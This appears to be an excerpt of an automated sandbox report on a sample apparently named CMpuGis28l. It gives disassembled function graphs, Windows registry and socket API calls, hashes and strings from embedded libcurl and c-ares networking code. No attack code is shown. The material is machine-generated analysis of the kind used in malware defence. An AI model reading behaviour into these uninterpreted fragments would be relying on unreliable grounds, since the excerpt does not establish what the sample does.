                                                        • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00FAAD0A
                                                        • Trying [%s]:%d..., xrefs: 00FAA689
                                                        • Local Interface %s is ip %s using address family %i, xrefs: 00FAAE60
                                                        • Couldn't bind to '%s' with errno %d: %s, xrefs: 00FAAE1F
                                                        • Local port: %hu, xrefs: 00FAAF28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: setsockopt
                                                        • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3981526788-2373386790
                                                        • Opcode ID: ad9a333d7315b3a5d3dda353dcd51ec9514559f159a5f0df667878a75bdb14a9
                                                        • Instruction ID: b315d7ca6fa79e8f0929eaf6431a3d1610dae658efb5c40867a69fde4d00bf64
                                                        • Opcode Fuzzy Hash: ad9a333d7315b3a5d3dda353dcd51ec9514559f159a5f0df667878a75bdb14a9
                                                        • Instruction Fuzzy Hash: 5D6205B1908341ABE721CF14CC46BABB7E5BF86314F04491DF98897292E775E848DB93
                                                        Function 01039740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 852 1039740-103975b 853 1039780-1039782 852->853 854 103975d-1039768 call 10378a0 852->854 855 1039914-103994e call 12f8b70 RegOpenKeyExA 853->855 856 1039788-10397a0 call 12f8e00 call 10378a0 853->856 863 10399bb-10399c0 854->863 864 103976e-1039770 854->864 867 1039950-1039955 855->867 868 103995a-1039992 RegQueryValueExA RegCloseKey call 12f8b98 855->868 856->863 870 10397a6-10397c5 856->870 865 1039a0c-1039a15 863->865 869 1039772-103977e 864->869 864->870 867->865 882 1039997-10399b5 call 10378a0 868->882 869->856 875 1039827-1039833 870->875 876 10397c7-10397e0 870->876 878 1039835-103985c call 102e2b0 * 2 875->878 879 103985f-1039872 call 1035ca0 875->879 880 10397e2-10397f3 call 12f8b50 876->880 881 10397f6-1039809 876->881 878->879 892 10399f0 879->892 893 1039878-103987d call 10377b0 879->893 880->881 881->875 891 103980b-1039810 881->891 882->863 882->870 891->875 895 1039812-1039822 891->895 898 10399f5-10399fb call 1035d00 892->898 899 1039882-1039889 893->899 895->865 906 10399fe-1039a09 898->906 899->898 903 103988f-103989b call 1024fe0 899->903 903->892 911 10398a1-10398c3 call 12f8b50 call 10378a0 903->911 906->865 916 10399c2-10399ed call 102e2b0 * 2 911->916 917 10398c9-10398db call 102e2d0 911->917 916->892 917->916 921 10398e1-10398f0 call 102e2d0 917->921 921->916 927 10398f6-1039905 call 10363f0 921->927 932 1039f66-1039f7f call 1035d00 927->932 933 103990b-103990f 927->933 932->906 935 1039a3f-1039a5a call 1036740 call 10363f0 933->935 935->932 941 1039a60-1039a6e call 1036d60 935->941 944 1039a70-1039a94 call 1036200 call 10367e0 call 1036320 941->944 945 1039a1f-1039a39 call 1036840 call 10363f0 941->945 956 1039a16-1039a19 944->956 957 1039a96-1039ac6 call 102d120 944->957 945->932 945->935 956->945 958 1039fc1 956->958 963 1039ae1-1039af7 call 102d190 957->963 964 1039ac8-1039adb call 102d120 957->964 960 1039fc5-1039ffd call 1035d00 call 102e2b0 * 2 958->960 960->906 963->945 970 1039afd-1039b09 call 1024fe0 963->970 964->945 964->963 970->958 976 1039b0f-1039b29 call 102e730 970->976 981 1039f84-1039f88 976->981 982 1039b2f-1039b3a call 10378a0 976->982 984 1039f95-1039f99 981->984 982->981 989 1039b40-1039b54 call 102e760 982->989 986 1039fa0-1039fb6 call 102ebf0 * 2 984->986 987 1039f9b-1039f9e 984->987 998 1039fb7-1039fbe 986->998 987->958 987->986 995 1039f8a-1039f92 989->995 996 1039b5a-1039b6e call 102e730 989->996 995->984 1002 1039b70-103a004 996->1002 1003 1039b8c-1039b97 call 10363f0 996->1003 998->958 1007 103a015-103a01d 1002->1007 1011 1039c9a-1039cab call 102ea00 1003->1011 1012 1039b9d-1039bbf call 1036740 call 10363f0 1003->1012 1009 103a024-103a045 call 102ebf0 * 2 1007->1009 1010 103a01f-103a022 1007->1010 1009->960 1010->960 1010->1009 1019 1039f31-1039f35 1011->1019 1020 1039cb1-1039ccd call 102ea00 call 102e960 1011->1020 1012->1011 1030 1039bc5-1039bda call 1036d60 1012->1030 1024 1039f40-1039f61 call 102ebf0 * 2 1019->1024 1025 1039f37-1039f3a 1019->1025 1039 1039ccf 1020->1039 1040 1039cfd-1039d0e call 102e960 1020->1040 1024->945 1025->945 1025->1024 1030->1011 1038 1039be0-1039bf4 call 1036200 call 10367e0 1030->1038 1038->1011 1058 1039bfa-1039c0b call 1036320 1038->1058 1044 1039cd1-1039cec call 102e9f0 call 102e4a0 1039->1044 1049 1039d53-1039d55 1040->1049 1050 1039d10 1040->1050 1063 1039d47-1039d51 1044->1063 1064 1039cee-1039cfb call 102e9d0 1044->1064 1056 1039e69-1039e8e call 102ea40 call 102e440 1049->1056 1053 1039d12-1039d2d call 102e9f0 call 102e4a0 1050->1053 1081 1039d5a-1039d6f call 102e960 1053->1081 1082 1039d2f-1039d3c call 102e9d0 1053->1082 1077 1039e90-1039e92 1056->1077 1078 1039e94-1039eaa call 102e3c0 1056->1078 1074 1039c11-1039c1c call 1037b70 1058->1074 1075 1039b75-1039b86 call 102ea00 1058->1075 1069 1039dca-1039ddb call 102e960 1063->1069 1064->1040 1064->1044 1086 1039e2e-1039e36 1069->1086 1087 1039ddd-1039ddf 1069->1087 1074->1003 1100 1039c22-1039c33 call 102e960 1074->1100 1075->1003 1097 1039f2d 1075->1097 1084 1039eb3-1039ec4 call 102e9c0 1077->1084 1105 1039eb0-1039eb1 1078->1105 1106 103a04a-103a04c 1078->1106 1101 1039dc2 1081->1101 1102 1039d71-1039d73 1081->1102 1082->1053 1108 1039d3e-1039d42 1082->1108 1084->945 1113 1039eca-1039ed0 1084->1113 1093 1039e38-1039e3b 1086->1093 1094 1039e3d-1039e5b call 102ebf0 * 2 1086->1094 1096 1039e06-1039e21 call 102e9f0 call 102e4a0 1087->1096 1093->1094 1103 1039e5e-1039e67 1093->1103 1094->1103 1133 1039e23-1039e2c call 102eac0 1096->1133 1134 1039de1-1039dee call 102ec80 1096->1134 1097->1019 1123 1039c66-1039c75 call 10378a0 1100->1123 1124 1039c35 1100->1124 1101->1069 1111 1039d9a-1039db5 call 102e9f0 call 102e4a0 1102->1111 1103->1056 1103->1084 1105->1084 1116 103a057-103a070 call 102ebf0 * 2 1106->1116 1117 103a04e-103a051 1106->1117 1108->1056 1152 1039db7-1039dc0 call 102eac0 1111->1152 1153 1039d75-1039d82 call 102ec80 1111->1153 1121 1039ee5-1039ef2 call 102e9f0 1113->1121 1116->998 1117->958 1117->1116 1121->945 1139 1039ef8-1039f0e call 102e440 1121->1139 1144 103a011 1123->1144 1145 1039c7b-1039c8f call 102e7c0 1123->1145 1131 1039c37-1039c51 call 102e9f0 1124->1131 1131->1003 1162 1039c57-1039c64 call 102e9d0 1131->1162 1155 1039df1-1039e04 call 102e960 1133->1155 1134->1155 1160 1039ed2-1039edf call 102e9e0 1139->1160 1161 1039f10-1039f26 call 102e3c0 1139->1161 1144->1007 1145->1003 1165 1039c95-103a00e 1145->1165 1167 1039d85-1039d98 call 102e960 1152->1167 1153->1167 1155->1086 1155->1096 1160->945 1160->1121 1161->1160 1179 1039f28 1161->1179 1162->1123 1162->1131 1165->1144 1167->1101 1167->1111 1179->958
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 01039946
                                                        • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 01039974
                                                        • RegCloseKey.KERNELBASE(?), ref: 0103998B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                        • API String ID: 3677997916-4129964100
                                                        • Opcode ID: a48d6dab3be2159c6c762a7f168d9b9b9ceb07f63c10efc4a3b573b2f42f4956
                                                        • Instruction ID: f81948c6c09f4eec4a29d9d354eb2359090d35892a0a2358918bd610b1a07072
                                                        • Opcode Fuzzy Hash: a48d6dab3be2159c6c762a7f168d9b9b9ceb07f63c10efc4a3b573b2f42f4956
                                                        • Instruction Fuzzy Hash: 3632E8B1904212ABFB51AB24EC41A6B77DCAFA4308F084474FDC997262F772E915C793
                                                        Function 00FA8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1353 fa8b50-fa8b69 1354 fa8b6b-fa8b74 1353->1354 1355 fa8be6 1353->1355 1357 fa8beb-fa8bf2 1354->1357 1358 fa8b76-fa8b8d 1354->1358 1356 fa8be9 1355->1356 1356->1357 1359 fa8b8f-fa8ba7 call f86e40 1358->1359 1360 fa8bf3-fa8bfe call faa550 1358->1360 1367 fa8cd9-fa8d16 SleepEx 1359->1367 1368 fa8bad-fa8baf 1359->1368 1365 fa8de4-fa8def 1360->1365 1366 fa8c04-fa8c08 1360->1366 1371 fa8e8c-fa8e95 1365->1371 1372 fa8df5-fa8e19 call faa150 1365->1372 1369 fa8c0e-fa8c1d 1366->1369 1370 fa8dbd-fa8dc3 1366->1370 1385 fa8d18-fa8d20 1367->1385 1386 fa8d22 1367->1386 1373 fa8ca6-fa8cb0 1368->1373 1374 fa8bb5-fa8bb9 1368->1374 1379 fa8c1f-fa8c30 connect 1369->1379 1380 fa8c35-fa8c48 call faa150 1369->1380 1370->1356 1377 fa8f00-fa8f06 1371->1377 1378 fa8e97-fa8e9c 1371->1378 1409 fa8e1b-fa8e26 1372->1409 1410 fa8e88 1372->1410 1373->1367 1381 fa8cb2-fa8cb8 1373->1381 1374->1357 1375 fa8bbb-fa8bc2 1374->1375 1375->1357 1384 fa8bc4-fa8bcc 1375->1384 1377->1357 1387 fa8e9e-fa8eb6 call f82a00 1378->1387 1388 fa8edf-fa8eef call f778b0 1378->1388 1379->1380 1408 fa8c4d-fa8c4f 1380->1408 1389 fa8cbe-fa8cd4 call fab180 1381->1389 1390 fa8ddc-fa8dde 1381->1390 1393 fa8bce-fa8bd2 1384->1393 1394 fa8bd4-fa8bda 1384->1394 1396 fa8d26-fa8d39 1385->1396 1386->1396 1387->1388 1407 fa8eb8-fa8edd call f83410 * 2 1387->1407 1412 fa8ef2-fa8efc 1388->1412 1389->1365 1390->1356 1390->1365 1393->1357 1393->1394 1394->1357 1401 fa8bdc-fa8be1 1394->1401 1404 fa8d3b-fa8d3d 1396->1404 1405 fa8d43-fa8d61 call f8d8c0 call faa150 1396->1405 1411 fa8dac-fa8db8 call fb50a0 1401->1411 1404->1390 1404->1405 1432 fa8d66-fa8d74 1405->1432 1407->1412 1415 fa8c8e-fa8c93 1408->1415 1416 fa8c51-fa8c58 1408->1416 1417 fa8e28-fa8e2c 1409->1417 1418 fa8e2e-fa8e85 call f8d090 call fb4fd0 1409->1418 1410->1371 1411->1357 1412->1377 1425 fa8dc8-fa8dd9 call fab100 1415->1425 1426 fa8c99-fa8c9f 1415->1426 1416->1415 1422 fa8c5a-fa8c62 1416->1422 1417->1410 1417->1418 1418->1410 1428 fa8c6a-fa8c70 1422->1428 1429 fa8c64-fa8c68 1422->1429 1425->1390 1426->1373 1428->1415 1435 fa8c72-fa8c8b call fb50a0 1428->1435 1429->1415 1429->1428 1432->1357 1433 fa8d7a-fa8d81 1432->1433 1433->1357 1438 fa8d87-fa8d8f 1433->1438 1435->1415 1442 fa8d9b-fa8da1 1438->1442 1443 fa8d91-fa8d95 1438->1443 1442->1357 1446 fa8da7 1442->1446 1443->1357 1443->1442 1446->1411
                                                        APIs
                                                        • connect.WS2_32(?,?,00000001), ref: 00FA8C30
                                                        • SleepEx.KERNELBASE(00000000,00000000), ref: 00FA8CF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: Sleepconnect
                                                        • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                        • API String ID: 238548546-879669977
                                                        • Opcode ID: e0dd4e9eb4e305844b1433ab0dc62137c7f07377accca78bcd44b38faea117e4
                                                        • Instruction ID: 5b6ec7823cd68da7b815abee5f88e0f6a0413759da33144d5b3f4a8dcc356763
                                                        • Opcode Fuzzy Hash: e0dd4e9eb4e305844b1433ab0dc62137c7f07377accca78bcd44b38faea117e4
                                                        • Instruction Fuzzy Hash: 11B1E6B0A04306EFD710DF24CC85BA677E4AF423A4F14852CE8594B2D2DBB5EC56EB61
                                                        Function 00F72F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1447 f72f17-f72f8c call 13f0df0 call 13f11e0 1452 f731c9-f731cd 1447->1452 1453 f731d3-f731d6 1452->1453 1454 f72f91-f72ff4 call f71619 RegOpenKeyExA 1452->1454 1457 f731c5 1454->1457 1458 f72ffa-f7300b 1454->1458 1457->1452 1459 f7315c-f731ac RegEnumKeyExA 1458->1459 1460 f731b2-f731c2 1459->1460 1461 f73010-f73083 call f71619 RegOpenKeyExA 1459->1461 1460->1457 1465 f7314e-f73152 1461->1465 1466 f73089-f730d4 RegQueryValueExA 1461->1466 1465->1459 1467 f730d6-f73137 call 13f10c0 call 13f1150 call 13f11e0 call 13f0ff0 call 13f11e0 call 13ef560 1466->1467 1468 f7313b-f7314b RegCloseKey 1466->1468 1467->1468 1468->1465
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: EnumOpen
                                                        • String ID: d
                                                        • API String ID: 3231578192-2564639436
                                                        • Opcode ID: 0b73a983fa2282059fd391aded35ac824ec4ca1c0974273a1413423fa688e827
                                                        • Instruction ID: 2ecec21eb8ae37e3e40195401e196e4911d9d67c7778fb0887ccffc3de8a8efa
                                                        • Opcode Fuzzy Hash: 0b73a983fa2282059fd391aded35ac824ec4ca1c0974273a1413423fa688e827
                                                        • Instruction Fuzzy Hash: 8371A2B490431ADFDB50DF69D98479EBBF0BF84308F10885DE99897300E7749A889F92
                                                        Function 00FA9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1481 fa9290-fa92ed call f776a0 1484 fa93c3-fa93ce 1481->1484 1485 fa92f3-fa92fb 1481->1485 1494 fa93d0-fa93e1 1484->1494 1495 fa93e5-fa9427 call f8d090 call fb4f40 1484->1495 1486 fa93aa-fa93af 1485->1486 1487 fa9301-fa9333 call f8d8c0 call f8d9a0 1485->1487 1488 fa9456-fa9470 1486->1488 1489 fa93b5-fa93bc 1486->1489 1506 fa93a7 1487->1506 1507 fa9335-fa9364 WSAIoctl 1487->1507 1492 fa9429-fa9431 1489->1492 1493 fa93be 1489->1493 1497 fa9439-fa943f 1492->1497 1498 fa9433-fa9437 1492->1498 1493->1488 1494->1489 1499 fa93e3 1494->1499 1495->1488 1495->1492 1497->1488 1502 fa9441-fa9453 call fb50a0 1497->1502 1498->1488 1498->1497 1499->1488 1502->1488 1506->1486 1510 fa939b-fa93a4 1507->1510 1511 fa9366-fa936f 1507->1511 1510->1506 1511->1510 1513 fa9371-fa9390 setsockopt 1511->1513 1513->1510 1514 fa9392-fa9395 1513->1514 1514->1510
                                                        APIs
                                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00FA935D
                                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00FA9389
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: Ioctlsetsockopt
                                                        • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                        • API String ID: 1903391676-2691795271
                                                        • Opcode ID: 4c59df7a3daea88ec4f49b6dc05af576883311e594d23da49b74b2acc5ec1567
                                                        • Instruction ID: 67e9576fe00091175b6757fa590bccafda030354af197afb2b7b0b0f4ebbdf56
                                                        • Opcode Fuzzy Hash: 4c59df7a3daea88ec4f49b6dc05af576883311e594d23da49b74b2acc5ec1567
                                                        • Instruction Fuzzy Hash: D35107B5A04305ABEB10DF24CC81FAAB7B9FF89324F148529FD488B282D771E951D791
                                                        Function 00F776A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1515 f776a0-f776be 1516 f776e6-f776f2 send 1515->1516 1517 f776c0-f776c7 1515->1517 1519 f776f4-f77709 call f772a0 1516->1519 1520 f7775e-f77762 1516->1520 1517->1516 1518 f776c9-f776d1 1517->1518 1522 f776d3-f776e4 1518->1522 1523 f7770b-f77759 call f772a0 call f7cb20 call 12f8c50 1518->1523 1519->1520 1522->1519 1523->1520
                                                        APIs
                                                        • send.WS2_32(multi.c,?,?,?,00F73D4E,00000000,?,?,00F807BF), ref: 00F776EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                        • API String ID: 2809346765-3388739168
                                                        • Opcode ID: 752c4c71576f9e34a80f6ee6892a17b6b2db28671dc74fccb7c1d6e63d797f68
                                                        • Instruction ID: 9e57c38c2452dbb1511d4e3799f3387293cd3d58e5a4efe99574dba598c769ea
                                                        • Opcode Fuzzy Hash: 752c4c71576f9e34a80f6ee6892a17b6b2db28671dc74fccb7c1d6e63d797f68
